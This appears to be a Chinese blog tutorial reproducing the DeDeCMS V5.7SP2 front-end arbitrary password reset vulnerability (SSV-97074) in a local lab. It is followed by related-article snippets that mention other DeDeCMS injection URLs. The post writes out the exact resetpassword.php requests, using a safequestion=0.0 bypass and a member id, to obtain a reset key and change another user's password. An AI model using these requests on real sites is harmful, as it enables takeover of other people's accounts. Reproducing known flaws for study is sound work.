DeDeCMS前台任意用户密码修改漏洞复现

最新推荐文章于 2023-11-14 19:45:00 发布
最新推荐文章于 2023-11-14 19:45:00 发布
阅读量3k 收藏 6
点赞数
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Coffilater/article/details/121652334
版权

一、漏洞概述

1.漏洞简介

织梦内容管理系统(DedeCms)的前台任意用户密码修改漏洞,被Seebug 漏洞平台[3]收录该漏洞,漏洞编号为 SSV-97074。

2.漏洞限制 

1、 只影响前台账户

2、 只能修改未设置安全问题的账户

3.影响版本

DeDeCMSV5.7SP2 正式版(2018-01-09)

二、漏洞复现

1.复现环境

PHP 5.6

DeDeCMSV5.7SP2 正式版(2018-01-09)

2.复现过程及结果

(一)搭建网站,这里用的是phpstudy

 注意:DeDeCMSV5.7SP2 里面的文件一定要放在它的根目录下

 

 

 否则安装DeDeCMS时会出现打不开的情况会出现打不开的情况

 (二)安装DeDeCMS

地址栏输入 域名/uploads/install/index.php进入安装页面

如:www.iwantfff.com/uploads/install/index.php 

 点击继续

 数据库的密码在phpstudy查看

 

 

如果你做不成功第二次想再做过,就会显示数据库已存在,但是这个不用管,没有影响的。

 (三)登录,注册

(1)登陆后台,打开会员功能

 

 (2)注册一个没有安全问题的会员

 登录管理员账号,可以看到已经注册好的会员 。

 (四)burp抓包

(1)输入 

域名/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2

如:

www.iwantfff.com/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2

抓包得key,这是一会儿修改密码的临时验证码验证码。

 (2)修改密码

输入 :域名/member/resetpassword.php?dopost=getpasswd&id=2

如:www.iwantfff.com/member/resetpassword.php?dopost=getpasswd&id=2

 修改成功。

 

Coffilater
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
前端任意用户登入逻辑漏洞
qq_46487664的博客
07-25 640
2.3 将index.html、login.php和test.html三个文件放入test目录下。3.8点击forword进行重放响应包,发现成功访问了test.html文件,实现登入绕过。3.8再次点击forword,发现304状态码,也就是重定向到了test.html文件。2.1.准备项目文件index.html,login.php,test.html。2.4进入宝塔面板,点击网站,将网站目录修改为/www/wwwroot/test。抓取响应包设置,选择proxy模块,点击options。
逻辑漏洞----任意账号注册
qq_44418229的博客
07-26 6991
逻辑漏洞--未验证,批量注册,个人信息伪造,前端绕过,用户名覆盖
metinfo_4.0任意密码修改漏洞
acdcccc的博客
09-06 79
metinfo4.0任意密码修改漏洞
任意注册漏洞
最新发布
2301_80115097的博客
11-14 113
1.未验证邮箱/手机号 情景:应用为了方便用户记录用户名,使用邮箱和手机号作为用户名(因此很多应用在注册的时候就要求用户填写,多数时候都会给用户发送激活信息,激活后才能登录) 缺陷: 1、未审核邮箱/手机号是否有效(及未发送验证信息),从而实现任意注册账号 2、未验证数据库中是否已经存在相同的用户名(导致同一账号,有2个密码,且用户数据产生读取问题)2、不安全验证邮箱/手机号 用户注册邮箱/手机号提交后,会通过发验证码等方法对其真实性进行验证 缺陷: 1、返回的验证码:验证码信息会隐藏在返回包中,或hidd
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改 漏洞复现(包括环境搭建)
aarong的博客
11-22 3456
目录一、漏洞概述二、环境搭建三、漏洞复现 一、漏洞概述 1 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2 漏洞限制 ​ 1、 只影响前台账户 ​ 2、 只能修改
dedecms会员注册注入漏洞
weixin_33912453的博客
03-30 350
一、首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)二、然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面 看是否可注入三、爆用户:/member/ajax_membergroup.php?action=post&memb...
漏洞复现DeDeCMS织梦
qq_53188113的博客
11-25 2985
目录 一、复现环境 二、复现过程及环境 一、复现环境 PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 二、复现过程及环境 安装 DeDeCMS 首先,利用PHPstudy安装环境 点击网站,进入后再点击创建网站,然后填写域名,可根据自己的需要来填写 回到文件夹,打开 DeDeCMS所在文件夹的uploads路径,把其下所有的文件复制到 studypro文件夹的www目录中即可 域名/install/ 进入安装页面 填写好..
织梦任意前台密码修改漏洞复现
m0_57851357的博客
12-12 2808
一、背景 织梦内容管理系统(DedeCms)以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 二、复现过程 所需环境: PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 过...
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
m0_60466340的博客
11-28 3068
漏洞概述 漏洞简介 织梦内容管理系统(DedeCms),以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关于 DeDeCMS 前台任意用...
DeDeCMS前台任意用户密码修改漏洞复现.pdf
12-16
DeDeCMS前台任意用户密码修改漏洞复现
pinohans#pinohans.github.io#Dedecms 前台任意用户密码修改1
07-25
Dedecms 前台任意用户密码修改影响版本漏洞成因在用户密码重置功能处,php 存在弱类型比较,导致如果用户没有设置密保问题的情况下可以绕过验证密保问题,直接
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
wLHK-Dedecms漏洞整理.pdf
09-20
wLHK-Dedecms漏洞整理.pdf
dedeCMS前台用户密码重置漏洞复现与分析
看不尽的尘埃——博客
11-19 547
版本:5.7 分析写在了后面 详细过程 安装     由于dede在安装完成后没开启会员注册,所以安装完成后首先进入后台,开启网站会员注册。  开启后,注册一个test账号,密码为123456。需要注意的是不要设置安全问题,才可以复现漏洞。  注册完成  进入后台查看test用户的mid值  ...
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1)
午夜安全
11-17 4259
《WEB安全渗透测试》(17)Dedecms越权漏洞+前台重置管理员密码漏洞复现(1) 在Windows server2008服务器上安装phpstudy,将dedecms的网站源码复制到C:\phpStudy\PHPTutorial\WWW\下,启动phpstudy,运行模式选择系统服务,安装成功后,可以在浏览器访问服务器ip地址,如下所示:访问如下安装地址,提示删除install/install_lock.txt。删除后,可以正常访问,之后按照提示安装完成即可。安装完成后,访问首页。...
dedecms织梦上传漏洞怎么修复
09-05 230
漏洞DedeCMS V5.7 SP2正式版(2018-01-09) 已经修复过,已经你的织梦程序已经是这个版本的话,可以忽略以下修复教程,不放心的可以打开文件对比一下。自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示。打开 /include/uploadsafe.inc.php 找到 40至43行。dedecms过滤逻辑不严导致上传漏洞dedecms上传漏洞
任意密码登录——密码找回漏洞
记录并分享学习安全的知识点..
04-15 1320
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、漏洞存在的点 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解。 密码找回凭证可从客户端直接获取。 密码找回凭证在页面中可以直接获取。 密码找回凭证存并非只是与单个用户并绑定的问题。 密码找回凭证存并非只是与单个用户并绑定的问题。 用户找回密码的邮箱地址或者手机号码被修改。 在最后提交修改密码处的逻辑错误。 二、漏洞复现 (一)密码找回凭证存放在cookie中 1.点击.
Dedecms会员中心注入漏洞
weixin_33721344的博客
03-30 569
详细说明: member/buy_action.php   require_once(dirname(__FILE__)."/config.php");   CheckRank(0,0);   $menutype = 'mydede';   $menutype_son = 'op';   require_once DEDEINC.'/dedetemplate.class.ph...
dedecms漏洞复现
03-28
由于 Dedecms 平台存在多个漏洞,以下是一个常见的 Dedecms 漏洞复现过程: 1. 扫描目标 Dedecms 站点,确定其版本号和漏洞类型。 2. 找到对应的漏洞利用代码,例如 Dedecms v5.7 SP2 sql注入漏洞利用代码: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值